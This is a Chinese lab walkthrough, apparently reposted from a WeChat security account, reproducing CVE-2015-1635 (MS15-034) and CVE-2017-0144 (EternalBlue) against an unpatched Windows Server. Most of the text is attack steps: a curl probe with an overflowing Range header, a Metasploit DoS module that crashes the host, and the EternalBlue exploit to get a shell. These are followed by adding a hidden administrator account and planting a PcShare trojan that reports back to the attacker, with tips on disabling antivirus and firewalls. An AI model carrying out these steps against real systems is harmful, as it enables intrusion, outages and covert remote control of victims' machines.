CVE-2015-1635-HTTP.SYS 远程执行代码漏洞
在 2015 年 4 月安全补丁日,微软发布的众多安全更新中,修复了 HTTP.sys 中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。
漏洞编号:CVE-2015-1635
微软通告:MS15-034
漏洞组件:HTTP.sys
影响系统:
Windows 7/8
Windows Server 2008 R2
Windows Server 2012 / R2(默认开启 IIS)
漏洞影响:
拒绝服务(DoS)— 立即蓝屏
潜在远程代码执行(复杂但存在)
攻击者可通过向启用IIS的服务器发送特制的Range请求,造成系统崩溃甚至远程执行代码,无需认证即可发起攻击。微软已通过KB3042553补丁修复此漏洞。
环境准备(Win2008 R2 + IIS + kali)
安装系统与配置 IIS
安装 Windows Server 2008 R2(未打补丁)
两台机器在同一网络(可通信)。可以互相ping通
安装 IIS 服务(默认开启 HTTP.sys)
服务器管理器 → 角色 → 添加角色 → Web Server(IIS)
查看系统版本(PowerShell 或 CMD 查看版本)
(Get-Item "C:WindowsSystem32driversHTTP.sys").VersionInfo | Format-List
6.1.7601.18798 或更高,表示已修复
版本为:6.1.7600.16385,所以存在该漏洞。
msf漏洞利用
kali返回数据包判断是否存在ms15_034
curl -v 192.168.2.153 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"
|
|
|
|---|---|
curl |
|
-v |
|
192.168.2.153 |
|
-H "Host:irrelevant" |
|
-H "Range:bytes=0-18446744073709551615" |
关键部分:构造 异常范围请求,试图从第 0 字节读到 字节,这是远超正常范围的非法请求,会触发 HTTP.sys 的整数溢出漏洞2^64 - 1 |
如果出现416和Requested Range Not Satisfiable,则证明存在漏洞,反之,则不存在
msf寻找漏洞
搜索模块
msfconsole
msf6>search MS15-034
发现该漏洞有可利用的模块,
选择payload模块
选择payload模块,带有sanner的是验证模块,带有dos的是攻击模块:, 在 kali 系统,借助 metasploit 平台利用 ms15-034 漏洞读取服务器内存数据,这是获取内存信息的工具use 1
设置目标IP
看一下这个模块需要配置什么
show options
发现我们只需要设置目标ip就可以啦
set rhosts 目标ip
开始读取内存信息
但它在大多数环境下并不能真正实现“读取任意内存”的效果
dos攻击模块
利用 ms15-034 漏洞进行 ddos 攻击,同样借助 metasploit 平台
msf6>use auxiliary/dos/http/ms15_034_ulonglongadd
Msf6 auxiliary > set rhosts 目标ip
Msf6 auxiliary > set threads 10 (把攻击线程数设置成 10 个)
Threads => 10
Msf6 auxiliary > run
攻击开始后,win7 或 win2008 瞬间蓝屏然后自动重启(win7 肯定蓝屏重启,win2008 有时不成功,不蓝屏),截图如下,win2008已经自动重启了:
再run攻击一次就开始蓝屏
漏洞修复,打补丁,微软官方网站有提供的,这是最可靠的方式,或者执行如下动作:禁用 IIS 内核缓存(可能 会降低 IIS 性能)
CVE-2017-0144(MS17-010)网络服务器攻击
MS17-010 是一个严重的 Windows 漏洞,影响包括 Windows Server 2008 在内的多个版本,允许远程执行代码。它在 2017 年被披露,并被广泛用于“永恒之蓝”(EternalBlue)攻击
CVE名称:CVE-2017-0144
公开时间:2017年3月14日(MS17-010 公告发布)
影响系统:
Windows Vista / 7 / 8 / 10
Windows Server 2008 / 2012 / 2016
漏洞类型:SMBv1 远程代码执行(RCE)
利用方式:无需认证、可远程利用、使用端口 445(SMB)
nmap -p445 --script smb-vuln-ms17-010 192.168.2.153
可以使用 EternalBlue(Metasploit)对该主机进行漏洞利用(获得 shell)。
搜索漏洞可利用的模块
搜索出来好几个 ms17-010,到底哪个是攻击漏洞,我们要根据提示信息和手动验证的方式来验证,一般 exploit 开头的都是直接渗透攻击的工具,也就是在这里面选。路径中的 smb 表示服务的意思
选择模块
use exploit/windows/smb/ms17_010_eternalblue 或者 use 0
info //查看漏洞的信息
查看攻击参数
show options
指定 RHOST(remote host 靶机)和 LHOST(操作 机)。
当我们找到并 use 这个 msf17-010 漏洞的时候,其实 msf 就帮你指定好了这个木马,不需要我们再自己 set 了,所以这个指令不需要执行。记得关闭目标主机的防火墙,或者给防火墙添加一些端口出入规则,不然攻击可能会失败。并且查看一下是否打了最新的补丁,如果打了最新的补丁,那也是攻击失败的
开始攻击
得到shell
shell
查看用户
net user
发现中文乱码chcp 65001
创建用户
net user
添加为管理员
net localgroup administrators 22w4hyq /add
pcshare生成木马远程控制
我们上传一个远程桌面控制木马程序,pcshare 双击打开 PcShare.exe,然后点击弹框中的取消按钮 点击生成客户
查看当前打开 pcshare 工具的主机,在物理机打开的,物理机的 ip 的地址要填写在上面的弹框中,表示将来的木马程序将目标主机的数据发送给当前物理机的 pcshare 工具上点击生成,会弹出如下窗口,它自动生成了一个木马程序,先保存下来,文件名称随便写。注意,有可能被杀毒软件杀掉,因为是木马程序,所以要选择一个保存到一个设置了免杀的目录中去,比如 tools 文件夹(或这个时候关闭杀毒软件)。
先退出shelleixt
接着将生成的 muma.exe 文件上传到 kali 主机上,比如上传到了/root 目录下面。最后将上传到 kali 上的 muma.exe 程序文件上传到目标主机上,上传到目标的 c 盘根目录中。
upload /root/muma.exe C:
接下来通过 kali 的 msf,远程执行一下这个文件,提示如下进程建立,表示运行成功了。
execute -f c:\muma.exe
然后再去被攻击机看一下,这个文件运行成功之后,这个文件就消失了,其实是隐藏到某个驱动当中去了。然后看一下我们自己本机的 pcshare 工具窗口,等待一下之后,就看到有内容产生了。
注意:一定要先关闭自己本机的防火墙,不然 muma.exe 程序没办法连接上你的 pcshare 工具。
这就拿到了目标主机的所有操作,这里我们可以进行屏幕监控、保存屏幕录像、文件管理、进程管理、键盘管控(这个功能没试过)、注册表管理、音视频监控、窗口管理等等
成功上线
原文始发于微信公众号(Cauchy网安):漏洞复现:CVE-2015-1635、CVE-2017-0144
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论